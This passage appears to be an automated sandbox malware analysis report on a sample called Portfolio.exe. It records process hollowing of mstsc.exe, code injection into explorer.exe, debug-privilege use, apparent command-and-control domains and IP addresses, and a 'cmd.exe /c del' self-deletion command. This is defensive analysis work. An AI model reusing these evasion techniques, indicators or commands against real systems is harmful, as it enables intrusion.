Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0513D380 mov ecx, dword ptr fs:[00000030h]	14_2_0513D380
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050BB390 mov eax, dword ptr fs:[00000030h]	14_2_050BB390
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050B2397 mov eax, dword ptr fs:[00000030h]	14_2_050B2397
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05098794 mov eax, dword ptr fs:[00000030h]	14_2_05098794
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0514138A mov eax, dword ptr fs:[00000030h]	14_2_0514138A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050B4BAD mov eax, dword ptr fs:[00000030h]	14_2_050B4BAD
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050B4BAD mov eax, dword ptr fs:[00000030h]	14_2_050B4BAD
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050B4BAD mov eax, dword ptr fs:[00000030h]	14_2_050B4BAD
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05155BA5 mov eax, dword ptr fs:[00000030h]	14_2_05155BA5
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_051053CA mov eax, dword ptr fs:[00000030h]	14_2_051053CA
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_051053CA mov eax, dword ptr fs:[00000030h]	14_2_051053CA
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050ADBE9 mov eax, dword ptr fs:[00000030h]	14_2_050ADBE9
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050B03E2 mov eax, dword ptr fs:[00000030h]	14_2_050B03E2
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050B03E2 mov eax, dword ptr fs:[00000030h]	14_2_050B03E2
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050B03E2 mov eax, dword ptr fs:[00000030h]	14_2_050B03E2
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050B03E2 mov eax, dword ptr fs:[00000030h]	14_2_050B03E2
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050B03E2 mov eax, dword ptr fs:[00000030h]	14_2_050B03E2
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050B03E2 mov eax, dword ptr fs:[00000030h]	14_2_050B03E2
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050C37F5 mov eax, dword ptr fs:[00000030h]	14_2_050C37F5
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05098A0A mov eax, dword ptr fs:[00000030h]	14_2_05098A0A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0508C600 mov eax, dword ptr fs:[00000030h]	14_2_0508C600
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0508C600 mov eax, dword ptr fs:[00000030h]	14_2_0508C600
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0508C600 mov eax, dword ptr fs:[00000030h]	14_2_0508C600
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050B8E00 mov eax, dword ptr fs:[00000030h]	14_2_050B8E00
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050A3A1C mov eax, dword ptr fs:[00000030h]	14_2_050A3A1C
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050BA61C mov eax, dword ptr fs:[00000030h]	14_2_050BA61C
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050BA61C mov eax, dword ptr fs:[00000030h]	14_2_050BA61C
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05085210 mov eax, dword ptr fs:[00000030h]	14_2_05085210
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05085210 mov ecx, dword ptr fs:[00000030h]	14_2_05085210
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05085210 mov eax, dword ptr fs:[00000030h]	14_2_05085210
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05085210 mov eax, dword ptr fs:[00000030h]	14_2_05085210
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05141608 mov eax, dword ptr fs:[00000030h]	14_2_05141608
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0508AA16 mov eax, dword ptr fs:[00000030h]	14_2_0508AA16
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0508AA16 mov eax, dword ptr fs:[00000030h]	14_2_0508AA16
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050C4A2C mov eax, dword ptr fs:[00000030h]	14_2_050C4A2C
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050C4A2C mov eax, dword ptr fs:[00000030h]	14_2_050C4A2C
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0508E620 mov eax, dword ptr fs:[00000030h]	14_2_0508E620
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0513FE3F mov eax, dword ptr fs:[00000030h]	14_2_0513FE3F
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0514EA55 mov eax, dword ptr fs:[00000030h]	14_2_0514EA55
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05114257 mov eax, dword ptr fs:[00000030h]	14_2_05114257
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05089240 mov eax, dword ptr fs:[00000030h]	14_2_05089240
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05089240 mov eax, dword ptr fs:[00000030h]	14_2_05089240
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05089240 mov eax, dword ptr fs:[00000030h]	14_2_05089240
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05089240 mov eax, dword ptr fs:[00000030h]	14_2_05089240
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05097E41 mov eax, dword ptr fs:[00000030h]	14_2_05097E41
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05097E41 mov eax, dword ptr fs:[00000030h]	14_2_05097E41
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05097E41 mov eax, dword ptr fs:[00000030h]	14_2_05097E41
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05097E41 mov eax, dword ptr fs:[00000030h]	14_2_05097E41
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05097E41 mov eax, dword ptr fs:[00000030h]	14_2_05097E41
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05097E41 mov eax, dword ptr fs:[00000030h]	14_2_05097E41
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0514AE44 mov eax, dword ptr fs:[00000030h]	14_2_0514AE44
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0514AE44 mov eax, dword ptr fs:[00000030h]	14_2_0514AE44
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0509766D mov eax, dword ptr fs:[00000030h]	14_2_0509766D
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0513B260 mov eax, dword ptr fs:[00000030h]	14_2_0513B260
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_0513B260 mov eax, dword ptr fs:[00000030h]	14_2_0513B260
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050C927A mov eax, dword ptr fs:[00000030h]	14_2_050C927A
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_05158A62 mov eax, dword ptr fs:[00000030h]	14_2_05158A62
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050AAE73 mov eax, dword ptr fs:[00000030h]	14_2_050AAE73
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050AAE73 mov eax, dword ptr fs:[00000030h]	14_2_050AAE73
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050AAE73 mov eax, dword ptr fs:[00000030h]	14_2_050AAE73
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 14_2_050AAE73 mov eax, dword ptr fs:[00000030h]	14_2_050AAE73

Source: C:\Users\user\Desktop\Portfolio.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\Portfolio.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 72.167.241.46 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.timcrozier.com
Source: C:\Windows\explorer.exe	Network Connect: 168.206.243.213 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.scaledsales.com
Source: C:\Windows\explorer.exe	Domain query: www.fromthepittothepitts.com
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\Portfolio.exe

Memory written: C:\Users\user\Desktop\Portfolio.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\Portfolio.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Section loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Section loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\Portfolio.exe	Thread register set: target process: 3472			Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Thread register set: target process: 3472			Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\Portfolio.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\Portfolio.exe

Section unmapped: C:\Windows\SysWOW64\mstsc.exe base address: C70000

Jump to behavior

Source: C:\Users\user\Desktop\Portfolio.exe	Process created: C:\Users\user\Desktop\Portfolio.exe C:\Users\user\Desktop\Portfolio.exe			Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Portfolio.exe'			Jump to behavior

Source: explorer.exe, 00000006.00000000.270667428.0000000005EA0000.00000004.00000001.sdmp, mstsc.exe, 0000000E.00000002.500691219.0000000003910000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.253301402.0000000001640000.00000002.00000001.sdmp, mstsc.exe, 0000000E.00000002.500691219.0000000003910000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000006.00000000.253301402.0000000001640000.00000002.00000001.sdmp, mstsc.exe, 0000000E.00000002.500691219.0000000003910000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000006.00000002.496420831.0000000001128000.00000004.00000020.sdmp	Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000006.00000000.253301402.0000000001640000.00000002.00000001.sdmp, mstsc.exe, 0000000E.00000002.500691219.0000000003910000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000006.00000000.253301402.0000000001640000.00000002.00000001.sdmp, mstsc.exe, 0000000E.00000002.500691219.0000000003910000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Users\user\Desktop\Portfolio.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Portfolio.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
